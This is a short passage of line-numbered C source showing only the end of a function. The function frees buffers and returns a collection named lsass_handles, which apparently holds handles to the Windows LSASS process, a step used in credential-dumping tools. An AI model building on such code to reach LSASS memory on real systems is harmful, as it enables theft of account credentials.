201 |                 break;
202 |             }
203 |         }
204 |         free(objectTypeInfo);
205 |     }
206 |     free(handleInfo);
207 | 
208 |     return lsass_handles;
209 | }


--------------------------------------------------------------------------------